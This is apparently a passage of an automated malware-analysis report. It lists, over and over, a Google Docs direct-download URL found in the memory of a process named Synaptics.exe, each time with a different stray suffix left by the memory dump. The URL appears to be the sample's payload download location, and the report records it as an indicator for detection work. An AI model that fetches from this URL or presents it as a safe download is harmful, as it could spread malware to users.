                              Source: Synaptics.exe, 00000003.00000002.2677682323.000000000ED02000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2680758777.000000000EE9E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.000000000720A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download8
                              Source: Synaptics.exe, 00000003.00000002.2645686279.0000000000656000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.00000000071B2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2649692631.0000000005530000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2690870771.000000000F032000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download9
                              Source: Synaptics.exe, 00000003.00000002.2645686279.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download9fN
                              Source: Synaptics.exe, 00000003.00000002.2645686279.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download9q
                              Source: Synaptics.exe, 00000003.00000002.2660837811.00000000071B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download9x
                              Source: Synaptics.exe, 00000003.00000002.2660837811.000000000720A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2645686279.0000000000656000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.00000000071B2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2645686279.000000000063A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2682396163.000000000EF06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download:
                              Source: Synaptics.exe, 00000003.00000002.2678740944.000000000EDF8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download:AU
                              Source: Synaptics.exe, 00000003.00000002.2645686279.0000000000656000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.00000000071B2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2649692631.0000000005570000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download;
                              Source: Synaptics.exe, 00000003.00000002.2660837811.00000000070CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download;M
                              Source: Synaptics.exe, 00000003.00000002.2680758777.000000000EE40000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2680758777.000000000EE9E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.000000000720A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.00000000071B2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2649692631.0000000005530000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download=
                              Source: Synaptics.exe, 00000003.00000002.2680758777.000000000EE40000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.00000000071B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download?
                              Source: Synaptics.exe, 00000003.00000002.2645686279.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download?z
                              Source: Synaptics.exe, 00000003.00000002.2680758777.000000000EE40000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.00000000071B2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2649692631.0000000005530000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadA
                              Source: Synaptics.exe, 00000003.00000002.2680758777.000000000EE9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadAp.
                              Source: Synaptics.exe, 00000003.00000002.2660837811.000000000720A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadAv3a
                              Source: Synaptics.exe, 00000003.00000002.2680758777.000000000EE40000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2678740944.000000000EDF8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.000000000720A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2682396163.000000000EF06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadB
                              Source: Synaptics.exe, 00000003.00000002.2645686279.0000000000656000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2655247190.0000000007080000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadC
                              Source: Synaptics.exe, 00000003.00000002.2645686279.000000000063A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadC:
                              Source: Synaptics.exe, 00000003.00000002.2645686279.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadCZ
                              Source: Synaptics.exe, 00000003.00000002.2645686279.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadCg
                              Source: Synaptics.exe, 00000003.00000002.2645686279.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadCo
                              Source: Synaptics.exe, 00000003.00000002.2645686279.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadCr
                              Source: Synaptics.exe, 00000003.00000002.2660837811.00000000071B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadCy
                              Source: Synaptics.exe, 00000003.00000002.2680758777.000000000EE40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadCz
                              Source: Synaptics.exe, 00000003.00000002.2645686279.0000000000656000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2690870771.000000000F032000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2649692631.0000000005570000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadD
                              Source: Synaptics.exe, 00000003.00000002.2660837811.00000000071B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadDa
                              Source: Synaptics.exe, 00000003.00000002.2680758777.000000000EE40000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2680758777.000000000EE9E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.000000000720A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2645686279.0000000000656000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.00000000071B2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2649692631.0000000005530000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2649692631.0000000005570000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadE
                              Source: Synaptics.exe, 00000003.00000002.2660837811.000000000720A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.00000000071B2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2690870771.000000000F032000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2682396163.000000000EF06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadF
                              Source: Synaptics.exe, 00000003.00000002.2660837811.00000000070CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadF(
                              Source: Synaptics.exe, 00000003.00000002.2678740944.000000000EDF8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadFA
                              Source: Synaptics.exe, 00000003.00000002.2680758777.000000000EE40000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2680758777.000000000EE9E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.000000000720A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.00000000071B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadG
                              Source: Synaptics.exe, 00000003.00000002.2660837811.000000000720A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadG9
                              Source: Synaptics.exe, 00000003.00000002.2680758777.000000000EE40000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2680758777.000000000EE9E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.000000000720A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.00000000070CC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2649692631.0000000005570000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2694953008.00000000104BE000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadH
                              Source: Synaptics.exe, 00000003.00000002.2645686279.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadH-UA-1gv
                              Source: Synaptics.exe, 00000003.00000002.2680758777.000000000EE40000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.000000000720A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.00000000071B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadI
                              Source: Synaptics.exe, 00000003.00000002.2645686279.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadIH7
                              Source: Synaptics.exe, 00000003.00000002.2680758777.000000000EE40000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2646956253.0000000001FF0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2680758777.000000000EE9E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.000000000720A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.00000000071B2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2682396163.000000000EF06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadJ
                              Source: Synaptics.exe, 00000003.00000002.2678740944.000000000EDF8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadJC
                              Source: Synaptics.exe, 00000003.00000002.2645686279.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadJm(J
                              Source: Synaptics.exe, 00000003.00000002.2680758777.000000000EE40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadK
                              Source: Synaptics.exe, 00000003.00000002.2645686279.000000000063A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadK9
                              Source: Synaptics.exe, 00000003.00000002.2645686279.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadKf
                              Source: Synaptics.exe, 00000003.00000002.2645686279.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadKq
                              Source: Synaptics.exe, 00000003.00000002.2680758777.000000000EE40000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.00000000071B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadKx
                              Source: Synaptics.exe, 00000003.00000002.2680758777.000000000EE40000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2645686279.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadL
                              Source: Synaptics.exe, 00000003.00000002.2680758777.000000000EE9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadLo
                              Source: Synaptics.exe, 00000003.00000002.2660837811.00000000071B2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2649692631.0000000005530000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2690870771.000000000F032000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2649692631.0000000005570000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadM
                              Source: Synaptics.exe, 00000003.00000002.2660837811.000000000720A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2682396163.000000000EF06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadN
                              Source: Synaptics.exe, 00000003.00000002.2660837811.00000000071B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadNz
                              Source: Synaptics.exe, 00000003.00000002.2680758777.000000000EE40000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2677682323.000000000ED02000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.000000000720A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.00000000071B2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.00000000070CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadO
                              Source: Synaptics.exe, 00000003.00000002.2645686279.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadOY
                              Source: Synaptics.exe, 00000003.00000002.2680758777.000000000EE40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadOy
                              Source: Synaptics.exe, 00000003.00000002.2680758777.000000000EE40000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2680758777.000000000EE9E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.000000000720A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.00000000071B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadP
                              Source: Synaptics.exe, 00000003.00000002.2649692631.0000000005530000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadP)
                              Source: Synaptics.exe, 00000003.00000002.2645686279.0000000000656000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.00000000071B2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2649692631.0000000005530000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadQ
                              Source: Synaptics.exe, 00000003.00000002.2645686279.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadQS
                              Source: Synaptics.exe, 00000003.00000002.2645686279.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadQq
                              Source: Synaptics.exe, 00000003.00000002.2660837811.00000000071B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadQx
                              Source: Synaptics.exe, 00000003.00000002.2680758777.000000000EE40000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.00000000071B2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2682396163.000000000EF06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadR
                              Source: Synaptics.exe, 00000003.00000002.2645686279.0000000000656000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.00000000071B2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2690870771.000000000F032000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadS
                              Source: Synaptics.exe, 00000003.00000002.2660837811.00000000070CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadS%
                              Source: Synaptics.exe, 00000003.00000002.2645686279.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadSY
                              Source: Synaptics.exe, 00000003.00000002.2660837811.000000000720A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadSan
                              Source: Synaptics.exe, 00000003.00000002.2680758777.000000000EE40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadSy
                              Source: Synaptics.exe, 00000003.00000002.2680758777.000000000EE9E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.000000000720A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2690870771.000000000F032000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadT
                              Source: Synaptics.exe, 00000003.00000002.2660837811.00000000071B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadr.
                              Source: Synaptics.exe, 00000003.00000002.2678740944.000000000EDF8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrB
                              Source: Synaptics.exe, 00000003.00000002.2649692631.0000000005570000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadre
                              Source: Synaptics.exe, 00000003.00000002.2680758777.000000000EE9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrightn
                              Source: Synaptics.exe, 00000003.00000002.2660837811.00000000071B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrs
                              Source: Synaptics.exe, 00000003.00000002.2645686279.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrver:
                              Source: Synaptics.exe, 00000003.00000002.2645686279.00000000006AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrvice
                              Source: Synaptics.exe, 00000003.00000002.2680758777.000000000EE40000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2680758777.000000000EE9E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.00000000071B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloads
                              Source: Synaptics.exe, 00000003.00000002.2649692631.0000000005570000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadse
                              Source: Synaptics.exe, 00000003.00000002.2680758777.000000000EE9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadsion
                              Source: Synaptics.exe, 00000003.00000002.2680758777.000000000EE40000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.000000000720A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.00000000071B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadt
                              Source: Synaptics.exe, 00000003.00000002.2660837811.00000000071B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadt-Se
                              Source: Synaptics.exe, 00000003.00000002.2680758777.000000000EE9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadt-uri
                              Source: Synaptics.exe, 00000003.00000002.2649692631.0000000005570000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadt1
                              Source: Synaptics.exe, 00000003.00000002.2649692631.0000000005570000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtd
                              Source: Synaptics.exe, 00000003.00000002.2645686279.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtion:
                              Source: Synaptics.exe, 00000003.00000002.2680758777.000000000EE9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtions
                              Source: Synaptics.exe, 00000003.00000002.2649692631.0000000005570000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadts
                              Source: Synaptics.exe, 00000003.00000002.2680758777.000000000EE40000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.00000000071B2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2645686279.000000000063A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadu
                              Source: Synaptics.exe, 00000003.00000002.2645686279.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaduH
                              Source: Synaptics.exe, 00000003.00000002.2680758777.000000000EE9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadua-pl
                              Source: Synaptics.exe, 00000003.00000002.2645686279.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadur
                              Source: Synaptics.exe, 00000003.00000002.2680758777.000000000EE40000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.000000000720A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.00000000071B2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2682396163.000000000EF06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadv
                              Source: Synaptics.exe, 00000003.00000002.2649692631.0000000005570000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadvn
                              Source: Synaptics.exe, 00000003.00000002.2680758777.000000000EE40000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2680758777.000000000EE9E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2655247190.0000000007080000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2690870771.000000000F032000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadw
                              Source: Synaptics.exe, 00000003.00000002.2660837811.00000000071B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadw.gof
                              Source: Synaptics.exe, 00000003.00000002.2645686279.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadwX
                              Source: Synaptics.exe, 00000003.00000002.2645686279.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadwsq
